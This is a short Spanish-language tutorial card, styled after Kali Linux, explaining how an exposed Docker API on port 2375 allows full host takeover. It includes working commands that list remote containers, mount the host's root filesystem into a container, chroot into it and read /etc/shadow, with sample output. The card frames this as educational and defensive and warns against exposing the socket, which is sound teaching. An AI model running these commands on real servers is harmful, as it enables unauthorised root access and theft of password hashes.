KALI
Docker API expuesta
Si un servidor deja la API de Docker abierta en el puerto dos tres siete cinco, es una toma total.
Con esa API, cualquiera puede crear un contenedor que monte todo el disco del anfitrión, y desde ahí leer o escribir cualquier archivo del sistema, incluido el de contraseñas. Con docker menos H apuntas a la IP y listas o creas contenedores.
Nunca expongas el socket de Docker a la red sin protección. Es equivalente a dar acceso root.
# los comandos
kali@kali:~$ docker -H tcp://10.0.0.5:2375 pscopiarCONTAINER ID IMAGE STATUS
a1b2c3 nginx Up 3 days
kali@kali:~$ docker -H tcp://10.0.0.5:2375 run -v /:/host -it alpine chroot /host shcopiar# cat /etc/shadowcopiarroot:$6$... (¡acceso total al host!)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.